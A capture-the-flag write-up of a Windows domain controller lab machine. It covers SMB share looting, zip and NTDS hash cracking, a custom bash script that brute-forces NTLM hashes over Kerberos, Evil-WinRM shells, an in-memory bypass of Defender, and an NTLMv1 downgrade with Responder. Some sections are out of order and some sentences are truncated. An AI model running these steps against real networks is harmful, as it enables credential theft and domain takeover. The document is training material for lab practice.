As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Wed Apr 12 20:59:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.041s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
# Nmap done at Wed Apr 12 21:00:08 2023 -- 1 IP address (1 host up) scanned in 26.45 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135 10.10.10.213 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Apr 12 19:17:32 2023 as: nmap -sCV -p80,135 -Pn -n -oN targeted 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 19:17:47 2023 -- 1 IP address (1 host up) scanned in 14.76 seconds
The website on port 80 shows a hosting site named Gigantic Hosting. Nothing is interesting on the website.
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
-6 use IPv6 address.
# Nmap 7.93 scan initiated Wed Apr 12 21:00:16 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for apt
Host is up (0.036s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
49698/tcp open unknown
64885/tcp open unknown
# Nmap done at Wed Apr 12 21:00:43 2023 -- 1 IP address (1 host up) scanned in 26.41 seconds
There are way more ports exposed through IPv6 than IPv4. Let's get their services and versions.
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
-6 use IPv6 address.
# Nmap 7.93 scan initiated Wed Apr 12 22:12:17 2023 as: nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-12 20:12:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49688/tcp filtered unknown
49885/tcp filtered unknown
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2023-04-12T21:13:17+01:00
|_clock-skew: mean: -8m33s, deviation: 22m39s, median: 0s
| smb2-time:
| date: 2023-04-12T20:13:15
|_ start_date: 2023-04-12T17:09:56
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 22:13:25 2023 -- 1 IP address (1 host up) scanned in 67.49 seconds
This looks like a domain controller. Nmap got the domain name htb.local. Let's add it to the /etc/hosts file.
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
apt is an IPv6 address -- no workgroup available
As seen below, the backup share has one file called backup.zip. Let's transfer it to our local machine.
smbclient //apt/backup -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 07:30:52 2020
.. D 0 Thu Sep 24 07:30:52 2020
backup.zip A 10650961 Thu Sep 24 07:30:32 2020
5114623 blocks of size 4096. 2632003 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (2027.5 KiloBytes/sec) (average 2027.5 KiloBytes/sec)
If we try to unzip it, we'll see it is protected with a password.
unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
Let's use zip2john and john to get the password.
zip2john backup.zip > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2023-04-14 09:02) 14.28g/s 117028p/s 117028c/s 117028C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now, unzip the file, and we'll see
unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password: iloveyousomuch
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
creating: registry/
inflating: registry/SECURITY
inflating: registry/SYSTEM
The compressed file contains the ntds.dit and SYSTEM file. With these two files we could try to dump the NTDS hashes using secretsdump.
impacket-secretsdump -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile ntds_dump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::
...
[*] Cleaning up...
As we can see, there are a lot of users and hashes. Let's put the users in the users file, and the NTLM hashes in the ntlm file.
It found that the henry.vinson user is a valid user. As we have a valid user, and a list of NTLM hashes, we could try to brute force his NTLM by trying each has of the list. The problem is that if we try to do it through SMB we'll get banned.
crackmapexec smb apt -u 'henry.vinson' -H ntlm
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [-] htb.local\henry.vinson:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
...
SMB apt 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
It seems that the server is banning any attempt of brute force through SMB, but it doesn't through Kerberos, because we were able to test which users were valid. So we need to brute force the NTLM hash through Kerberos. I made the following bash script which tries to obtain a TGT for the henry.vinson user with each NTLM hash from the ntlm file. It uses the getTGT tool from impacket, and you can also set threads to make it faster.
#!/bin/bash
dc='apt'
username='henry.vinson'
domain='htb.local'
hash_list='/home/alfa8sa/HTB/machines/apt/ntlm'
threads=100
PROGRESS_BAR_WIDTH=25
draw_progress_bar() {
local __value=$1
local __max=$2
local __unit=${3:-""}
if (( $__max < 1 )); then __max=1; fi
local __percentage=$(( 100 - ($__max*100 - $__value*100) / $__max ))
local __num_bar=$(( $__percentage * $PROGRESS_BAR_WIDTH / 100 ))
printf "["
for b in $(seq 1 $__num_bar); do printf "#"; done
for s in $(seq 1 $(( $PROGRESS_BAR_WIDTH - $__num_bar ))); do printf " "; done
printf "] $__percentage%% ($__value / $__max $__unit)\r"
}
lines=$(wc -l $hash_list | awk '{print $1}')
counter=1
div=$(($lines/$threads+1))
for line in $(seq 1 $div); do
margin=$(expr $counter + $threads - 1)
regex=$(echo $counter,$margin"p")
hashes=$(sed -n $regex < $hash_list)
draw_progress_bar $(expr $counter - 1) $lines "hashes"
for hash in $hashes; do
impacket-getTGT $dc/$username@$domain -hashes :$hash | grep -q "ticket" && echo $hash > .hash &
done;wait
if [ -f ".hash" ]; then
echo ""
echo "Valid NTLM hash: " $(cat .hash)
rm -rf .hash
exit 0
fi
counter=$(($counter+$threads))
done
rm -rf .hash
Run the script to get the valid NTLM hash for henry.vinson.
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [+] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
There is one tool from impacket called reg.py, which allows to query registers remotely such us HKCR, HKCU, HKLM, HKU, or HKCC using valid credentials. We could see the content of the HKU registry.
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [+] htb.local\henry.vinson_adm:G1#Ny5@2dvht
They are valid, and this user seems to be a member of the Remote Management Users group because we can get a shell via WinRM and then grab the user flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type \users\henry.vinson_adm\desktop\user.txt
cfafacdccf12c0e1a3965551ba302274
Privilege Escalation
Let's upload the WinPEAS binary to the machine in order to find possible privilege escalation paths.
If we try to run the binary, we'll see that Windows Defender is blocking the binary.
.\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Fortunately for us, evil-winrm has a feature to bypass the antivirus. This way the binary will be loaded and executed in memory.
...
HTTPS = On
DNS = On
LDAP = On
...
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
...
Then, launch responder downgrading to LM.
responder -I tun0 --lm
-I network interface to use.
--lm force LM hashing downgrade.
Now we need to make the victim machine authenticate against our fake SMB server. As we know that Windows Defender is available, we can use the MpCmdRun.exe binary to load a random file from our fake SMB server.
Now that we have the real NTLM hash of the administrator user, we can get a shell as him, and then all we have to do is reap the harvest and take the root flag.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
9b4ea0031ea51d07dd67270520495d46
As port 135 is also open, we could try to identify the IP addresses of the machines. We'll have to do it with the tool.
It found that NTLM services and clients on the domain controller support NTLMv1. This is a problem because NTLMv1 uses a weak authentication which can be broken. The idea is to set a fake SMB server with responder, and capture the NTLMv1 hash of the machine, which can then be cracked with . First, modify the responder configuration file.
